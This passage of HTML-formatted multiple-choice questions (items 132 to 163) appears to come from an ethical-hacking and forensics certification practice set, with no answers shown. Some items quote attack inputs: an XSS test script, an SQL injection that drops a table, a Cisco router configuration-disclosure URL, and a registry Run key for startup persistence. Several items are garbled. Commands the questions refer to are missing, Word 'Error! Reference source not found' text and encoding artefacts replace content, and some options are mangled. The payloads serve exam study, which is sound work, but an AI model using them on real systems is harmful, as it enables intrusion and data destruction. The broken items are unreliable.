tahoma, sans-serif;"><span style="font-size: 12px;">132. At what layer of the OSI model do routers function on?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 4</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 3</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 1</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 5</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">133. George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">of their wireless network. He plans on remaining as ¡°stealthy¡± as possible during the scan. Why would a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">scanner like Nessus is not recommended in this situation?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Nessus is too loud</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Nessus cannot perform wireless testing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Nessus is not a network scanner</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. There are no ways of performing a ¡°stealthy¡± wireless scan</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">134. After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks. What</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">countermeasures could he take to prevent DDoS attacks?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Enable direct broadcasts</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Disable direct broadcasts</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Disable BGP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Enable BGP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">135. George is a senior security analyst working for a state agency in FloridA. His state.s congress just passed a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">bill mandating every state agency to undergo a security audit annually. After learning what will be</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">requires that an IDS with a ¡°time-based induction machine¡± be useD. What IDS feature must George</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">implement to meet this requirement?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Signature-based anomaly detection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Pattern matching</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Real-time anomaly detection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Statistical-based anomaly detection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">136. What is the target host IP in the following command?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 172.16.28.95</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 10.10.150.1</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Firewalk does not scan target hosts</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. This command is using FIN packets, which cannot scan target hosts</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">137. Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">many different programming as well as networking languages. What networking protocol language should</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">she learn that routers utilize?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. ATM</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. UDP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. BPG</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. OSPF</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">138. Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">contained sensitive corporate information regarding patents and company strategies. A month after the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">laptops were stolen, a competing company was found to have just developed products that almost exactly</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">duplicated products that Meyer produces. What could have prevented this information from being stolen</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">from the laptops?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. EFS Encryption</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. DFS Encryption</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. IPS Encryption</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. SDW Encryption</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">139. Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">send PDF documents containing sensitive information through E-mail to his customers. Bill protects the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">PDF documents with a password and sends them to their intended recipients.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Why PDF passwords do not offer maximum protection?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. PDF passwords can easily be cracked by software brute force tools</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. PDF passwords are converted to clear text when sent through E-mail</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. PDF passwords are not considered safe by Sarbanes-Oxley</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. When sent through E-mail, PDF passwords are stripped from the document completely</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">140. John and Hillary works at the same department in the company. John wants to find out Hillary.s network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">password so he can take a look at her documents on the file server. He enables Lophtcrack program to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">sniffing mode. John sends Hillary an email with a link to Error! Reference source not founD. What</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">information will he be able to gather from this?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Hillary network username and password hash</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The SID of Hillary network account</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The SAM file from Hillary computer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The network shares that Hillary has permissions</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">141. Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">down the city.s network using BGP devices and zombies? What type of Penetration Testing is Larry</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">planning to carry out?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Router Penetration Testing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. DoS Penetration Testing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Firewall Penetration Testing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Internal Penetration Testing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">142. An ¡°idle¡± system is also referred to as what?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. PC not connected to the Internet</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Zombie</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. PC not being used</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Bot</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">143. You are the network administrator for a small bank in Dallas, Texas. To ensure network security, you enact</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">a security policy that reQuires all users to have 14 character passwords. After giving your users 2 weeks</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">notice, you change the Group Policy to force 14 character passwords. A week later you dump the SAM</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">database from the standalone server and run a password-cracking tool</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">against it. Over 99% of the passwords are broken within an hour. Why were these passwords cracked so</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Quickly?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Passwords of 14 characters or less are broken up into two 7-character hashes</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. A password Group Policy change takes at least 3 weeks to completely replicate throughout a network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Networks using Active Directory never use SAM databases so the SAM database pulled was empty</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The passwords that were cracked are local accounts on the Domain Controller</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">144. What is the following command trying to accomplish?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Verify that UDP port 445 is open for the 192.168.0.0 network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Verify that TCP port 445 is open for the 192.168.0.0 network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Verify that NETBIOS is running for the 192.168.0.0 network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Verify that UDP port 445 is closed for the 192.168.0.0 network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">145. You are a security analyst performing a penetration tests for a company in the Midwest. After some initial</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">following URL that includes the IP address of one of the routers:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">http://172.168.4.131/level/99/exec/show/config</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">After typing in this URL, you are presented with the entire configuration file for that router. What have you</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">discovered?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. HTTP Configuration Arbitrary Administrative Access Vulnerability</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. HTML Configuration Arbitrary Administrative Access Vulnerability</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Cisco IOS Arbitrary Administrative Access Online Vulnerability</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. URL Obfuscation Arbitrary Administrative Access Vulnerability</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">146. You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">sensitive information about the company clients. You have rummaged through their trash and found very</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">little information. You do not want to set off any alarms on their network, so you plan on performing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">passive footprinting against their Web servers. What tool should you use?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Ping sweep</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Nmap</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Netcraft</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Dig</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">147. Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Tracert</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Smurf scan</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Ping trace</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. ICMP ping sweep</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">148. You are assisting a Department of Defense contract company to become compliant with the stringent</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">security policies set by the DoD. One such strict rule is that firewalls must only allow incoming</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">connections that were first initiated by internal computers. What type of firewall must you implement to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">abide by this policy?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Packet filtering firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Circuit-level proxy firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Application-level proxy firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Statefull firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">149. Michael works for Kimball Construction Company as senior security analyst. As part of yearly security</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">of the ports scanned do not give a response. In what state are these ports?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Closed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Open</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Stealth</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Filtered</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">150. If an attacker.s computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning,</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">what will be the response?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The zombie will not send a response</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 31402</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 31399</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 31401</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">151. You are carrying out the last round of testing for your new website before it goes live. The website has</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">many dynamic pages and connects to a SQL backend that accesses your product inventory in a database.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">You come across a web security site that recommends inputting the following code into a search field on</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">web pages to check for vulnerabilities:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;"><script>alert(¡°This is a test.¡±)</script></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">When you type this and click on search, you receive a pop-up window that says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°This is a test.¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What is the result of this test?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Your website is vulnerable to CSS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Your website is not vulnerable</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Your website is vulnerable to SQL injection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Your website is vulnerable to web bugs</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">152. You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">should you open for SNMP to work through Firewalls (Select 2)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 162</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 161</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 163</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 160</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">153. What will the following command produce on a website login page?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">SELECT email, passwd, login_id, full_name</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">FROM members</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">WHERE email = .someone@somehwere.com.; DROP TABLE members; ..</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Deletes the entire members table</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Inserts the Error! Reference source not founD. email address into the members table</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Retrieves the password for the first user in the members table</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. This command will not produce anything since the syntax is incorrect</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">154. Simon is a former employee of Trinitron XML InC. He feels he was wrongly terminated and wants to hack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">into his former company.s network. Since Simon remembers some of the server names, he attempts to run</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Send DOS commands to crash the DNS servers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Perform DNS poisoning</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Perform a zone transfer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Enumerate all the users in the domain</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">155. When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IDS is being used?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Passive IDS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Active IDS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Progressive IDS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. NIPS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">156. Which of the following filesystem is used by Mac OS X?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. EFS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. HFS+</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. EXT2</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. NFS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">157. Hackers can gain access to Windows Registry and manipulate user passwords, DNS settings, access rights</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">or others features that they may need in order to accomplish their objectives. One simple method for</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">loading an application at startup is to add an entry (Key) to the following Registry Hive:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. HKEY_LOCAL_MACHINEhardwarewindowsstart</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. HKEY_LOCAL_USERSSoftware|MicrosoftoldVersionLoad</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. HKEY_CURRENT_USERMicrosoftDefault</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. HKEY_LOCAL_MACHINESoftwareMicrosoftCurrentVersionRun</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">158. You are a computer forensics investigator working with local police department and you are called to assist</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">in an investigation of threatening emails. The complainant has printer out 27 email messages from the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">suspect and gives the printouts to you. You inform her that you will need to examine her computer because</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">you need access to the _________________________ in order to track the emails back to the suspect.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Routing Table</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Firewall log</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Configuration files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Email Header</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">159. The rule of thumb when shutting down a system is to pull the power plug. However, it has certain</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">drawbacks. Which of the following would that be?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Any data not yet flushed to the system will be lost</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. All running processes will be lost</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The /tmp directory will be flushed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Power interruption will corrupt the pagefile</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">160. The efforts to obtain information before a trail by demanding documents, depositions, questioned and</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">answers written under oath, written requests for admissions of fact and examination of the scene is a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">description of what legal term?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Detection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Hearsay</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Spoliation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Discovery</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">161. Microsoft Outlook maintains email messages in a proprietary format in what type of file?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. .email</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. .mail</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. .pst</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. .doc</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">162. Law enforcement officers are conducting a legal search for which a valid warrant was obtaineD. While</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">conducting the search, officers observe an item of evidence for an unrelated crime that was not included in</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">term used to describe how this evidence is admissible?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Plain view doctrine</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Corpus delicti</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Locard Exchange Principle</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Ex Parte Order</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">163. You are working as an independent computer forensics investigator and receive a call from a systems</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">administrator for a local school system requesting your assistance. One of the students at the local high</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">school is suspected of 